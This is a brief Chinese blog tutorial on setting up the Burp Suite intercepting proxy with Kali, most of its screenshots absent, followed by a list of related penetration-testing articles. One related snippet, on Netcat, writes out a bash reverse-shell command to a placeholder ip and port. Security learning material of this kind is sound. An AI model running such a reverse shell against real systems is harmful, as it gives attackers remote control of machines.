滲透神器Burp Suite圖解

原創 我是程序员小贱 2020-02-21 10:32

1 安裝

2 burs功能圖解

 3 工具欄詳解

 4 實戰

(1) 網絡配置

一臺kali 一臺msf 網絡採用nat

nat網絡設置方法:

 查看路由

 配置文件

(2) 代理設置

  • bur代理設置

  

  •  瀏覽器代理設置

  

  •  burp生成證書方法

  

  •  瀏覽器加載證書

  

 (3)查看流量是否被攔截下來

 

  • 使用方法:

  1 打開攔截

    

   2 訪問baidu,發現瀏覽器開始轉圈

   3 出現如下 攔截成功

       

 想學習什麼就去學習吧。

 

我是程序員小賤
發佈了34 篇原創文章 · 獲贊 65 · 訪問量 1萬+
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

【安全滲透】sql注入

目錄1. sql 注入1.1 sql 注入 介紹1.2 sql 注入 原理1.3 sql 注入 危害1.4 sql 注入 實現方式2. 環境搭建2.1 vmware虛擬機軟件2.2 靶機(學習使用項目環境)2.3 滲透機(學習攻擊

披着床单的小王子 2020-07-06 18:44:36

第三週任務,利用文件上傳漏洞

0x00 前言 本週主要學習了文件上傳各種姿勢,掌握了常見的黑白名單後綴繞過、文件內容檢查繞過的原理、實現及簡單防護。 0X01 文件上傳校驗姿勢 o 客戶端javascript校驗(一般只校驗後綴名) o 服務端校驗 o 文件頭

欧阳大仙萌萌哒 2020-07-01 04:05:33

信安入門神級書單

《社會工程:安全體系中的人性漏洞》 《Android應用安全防護和逆向分析》 《逆向工程核心原理》 《Metasploit滲透測試魔鬼訓練營》 《鳥哥linux的私房菜》(第三版) 《Linux二進制分析》 《網絡空間

欧阳大仙萌萌哒 2020-07-01 04:05:33

記錄一個反射型XSS漏洞

【漏洞發現與分析】 本地有個軟件系統,burpsuite開啓主動掃描,報了個XSS漏洞: 添加羣組功能的接口: 仔細確認,原本是個post: 漏洞是把請求參數放到get鏈接裏,且能成功執行: 【漏洞利用】: csdn發佈博客,博客

qq284489030 2020-06-30 15:01:35

【工具】Netcat(1)基本使用

一.概述 netcat是一款基於tcp/ip協議(c/s模型的)的工具。 netcat的功能包括: 數據傳輸 文件傳輸 建立後門 端口轉發 內外網突破 二.基礎使用方法 創建一個服務器端: nc -l -p [local_po

Hector Will 2020-06-26 09:24:30

【工具】Netcat(2)反彈shell

應用場景:某些拿到服務器權限之後,想要設置一個反彈shell。但是目標服務器上沒有安裝Netcat時。 1.反彈shell(bash) 反彈shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接

Hector Will 2020-06-26 09:24:30

XSS詳解(概念+靶場演示)反射型與存儲型的比較與詳細操作

Eichi_ 2020-05-06 18:27:40

【Shiro_exploit】PYTHON報錯解決:ModuleNotFoundError: No module named 'requests'

欧阳大仙萌萌哒 2020-05-05 12:11:26

CSRF 越權區別

qq284489030 2020-04-23 10:09:30

一、文件上傳漏洞 低、中、高三級別 詳解

Eichi_ 2020-04-21 00:36:09

二、文件包含漏洞 低、中 、高三級別詳解(一句話木馬,圖片木馬)

Eichi_ 2020-04-21 00:36:09

近日總結 -- 越權、CSRF、邏輯支付、存儲型 XSS

qq284489030 2020-04-19 09:47:42

TCP劫持下的反彈Shell注入攻擊

Eichi_ 2020-04-01 10:26:51

ARP欺騙攻擊

Eichi_ 2020-04-01 10:26:51

網絡安全基礎與常見攻擊(ARP攻擊、ICMP攻擊、DDOS攻擊、TCP RST攻擊)

Eichi_ 2020-04-01 10:26:51